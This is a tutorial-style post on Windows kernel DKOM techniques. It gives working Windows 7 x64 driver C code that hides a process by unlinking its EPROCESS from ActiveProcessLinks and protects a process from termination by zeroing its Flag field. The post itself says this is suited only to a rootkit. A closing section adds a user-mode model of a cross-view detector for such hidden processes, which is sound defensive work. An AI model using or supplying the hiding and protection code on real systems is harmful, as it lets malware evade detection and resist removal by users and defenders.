DKOM Hiding and protecting processes
The core operation is modifying the contents of nodes in a linked list.
The essence of DKOM process hiding and process protection is manipulating the EPROCESS structure. The relevant definitions differ between Windows versions, so the offsets must be determined for the target system; the data below uses Windows 7 x64 as the example.
Two members matter: ActiveProcessLinks and Flag.
ActiveProcessLinks links every EPROCESS into a doubly linked list. ZwQuerySystemInformation walks this list when it enumerates processes, so if an EPROCESS is removed from the list, ZwQuerySystemInformation can no longer enumerate the unlinked process, and the ring 3 process-enumeration functions that depend on it stop seeing it as well. Once Flag is set to 0, OpenProcess returns a failure. Note, however, that protecting a process with DKOM is quite dangerous: for example, calling CreateProcess will fail, and if the protection is not removed before the process exits there is a real chance of a blue screen. In short, DKOM process protection and process hiding are only suitable for a rootkit and do not apply to regular software. The code for hiding and protecting processes is as follows:
```c
#include <ntddk.h>

// Undocumented exports used below (not declared in the WDK headers).
NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS *Process);
NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);

// Target processes
PEPROCESS audiodg = NULL, dwm = NULL;
ULONG op_dat;   // original Flag value, needed to undo the protection later

// Offsets inside EPROCESS, valid for Windows 7 x64 only
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188
#define PROCESS_FLAG_OFFSET                 0x440

// Find an EPROCESS by image name by probing PIDs (PIDs are multiples of 4).
// The returned object carries a reference; the caller must ObDereferenceObject it.
PEPROCESS GetProcessObjectByName(char *name)
{
    SIZE_T i;
    for (i = 100; i < 20000; i += 4) {
        NTSTATUS st;
        PEPROCESS ep;
        st = PsLookupProcessByProcessId((HANDLE)i, &ep);
        if (NT_SUCCESS(st)) {
            char *pn = PsGetProcessImageFileName(ep);
            if (_stricmp(pn, name) == 0)
                return ep;
            ObDereferenceObject(ep);   // drop the reference on non-matching processes
        }
    }
    return NULL;
}

// Remove an entry from a doubly linked list after checking that it is well formed.
// Flink and Blink are left pointing at the entry itself so that a later removal
// (for example at process exit) does not touch the former neighbours.
VOID RemoveListEntry(PLIST_ENTRY ListEntry)
{
    KIRQL OldIrql = KeRaiseIrqlToDpcLevel();
    if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry &&
        ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry) {
        ListEntry->Flink->Blink = ListEntry->Blink;
        ListEntry->Blink->Flink = ListEntry->Flink;
        ListEntry->Flink = ListEntry;
        ListEntry->Blink = ListEntry;
    }
    KeLowerIrql(OldIrql);
}

// Hide process: unlink its EPROCESS from ActiveProcessLinks
VOID HideProcess(PEPROCESS Process)
{
    RemoveListEntry((PLIST_ENTRY)((ULONG64)Process + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
}

// Protection process: zero the Flag field and return the old value;
// call again with bIsProtect == FALSE and v == old value to restore it.
ULONG ProtectProcess(PEPROCESS Process, BOOLEAN bIsProtect, ULONG v)
{
    ULONG op;
    if (bIsProtect) {
        op = *(PULONG)((ULONG64)Process + PROCESS_FLAG_OFFSET);
        *(PULONG)((ULONG64)Process + PROCESS_FLAG_OFFSET) = 0;
        return op;
    } else {
        *(PULONG)((ULONG64)Process + PROCESS_FLAG_OFFSET) = v;
        return 0;
    }
}

VOID test()
{
    // Variable names are the author's; here they hold calc.exe and cmd.exe.
    audiodg = GetProcessObjectByName("calc.exe");
    DbgPrint("calc: %p\n", audiodg);
    if (audiodg) {
        // Restore with ProtectProcess(audiodg, FALSE, op_dat) before the process exits.
        op_dat = ProtectProcess(audiodg, TRUE, 0);
        ObDereferenceObject(audiodg);
    }
    dwm = GetProcessObjectByName("cmd.exe");
    DbgPrint("cmd: %p\n", dwm);
    if (dwm) {
        HideProcess(dwm);
        ObDereferenceObject(dwm);
    }
}
```
Result: the calculator can no longer be terminated, and cmd.exe no longer appears in the process list, yet the cmd window is still there:
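A defender's cross-view check for this kind of unlinking, added here as a portable user-mode model and not code from the original post: a PID-indexed table plays the role of the objects PsLookupProcessByProcessId can still return, an ActiveProcessLinks ring plays the role of the list ZwQuerySystemInformation walks, and any process present in the first view but missing from the second is reported as hidden. The process table, PIDs and names are constructed for the example.

```c
#include <stddef.h>
#include <string.h>

typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
/* Minimal stand-in for EPROCESS: only the fields the detector needs. */
typedef struct { unsigned pid; char name[16]; LIST_ENTRY ActiveProcessLinks; } PROC;
#define PROC_OF(le) ((PROC *)((char *)(le) - offsetof(PROC, ActiveProcessLinks)))

/* View 1: objects reachable by PID, as PsLookupProcessByProcessId would return them. */
static PROC table[8];
static int ntable = 0;
/* View 2: the ActiveProcessLinks ring that ZwQuerySystemInformation walks. */
static LIST_ENTRY head = { &head, &head };

static PROC *add_proc(unsigned pid, const char *name) {
    PROC *p = &table[ntable++];
    p->pid = pid;
    strncpy(p->name, name, sizeof p->name - 1); p->name[sizeof p->name - 1] = 0;
    p->ActiveProcessLinks.Blink = head.Blink;     /* insert at the tail of the ring */
    p->ActiveProcessLinks.Flink = &head;
    head.Blink->Flink = &p->ActiveProcessLinks;
    head.Blink = &p->ActiveProcessLinks;
    return p;
}

/* Constructed fixture: three processes, with the cmd.exe entry unlinked the way the
   page's RemoveListEntry leaves it (neighbours bypass it, it points at itself). */
static void build_fixture(void) {
    LIST_ENTRY *e;
    ntable = 0; head.Flink = head.Blink = &head;
    add_proc(4, "System"); add_proc(1234, "cmd.exe"); add_proc(2000, "calc.exe");
    e = &table[1].ActiveProcessLinks;
    e->Flink->Blink = e->Blink; e->Blink->Flink = e->Flink; e->Flink = e->Blink = e;
}

/* Cross-view check: every PID in the table that the list walk never reaches is
   hidden. Returns the number found; the first `max` PIDs are stored in `out`. */
static int find_hidden(unsigned *out, int max) {
    int n = 0, i;
    for (i = 0; i < ntable; i++) {
        LIST_ENTRY *le; int seen = 0;
        for (le = head.Flink; le != &head; le = le->Flink)
            if (PROC_OF(le)->pid == table[i].pid) { seen = 1; break; }
        if (!seen) { if (n < max) out[n] = table[i].pid; n++; }
    }
    return n;
}
```

On the fixture, find_hidden reports exactly one PID, 1234, the unlinked cmd.exe entry; a clean system yields zero discrepancies.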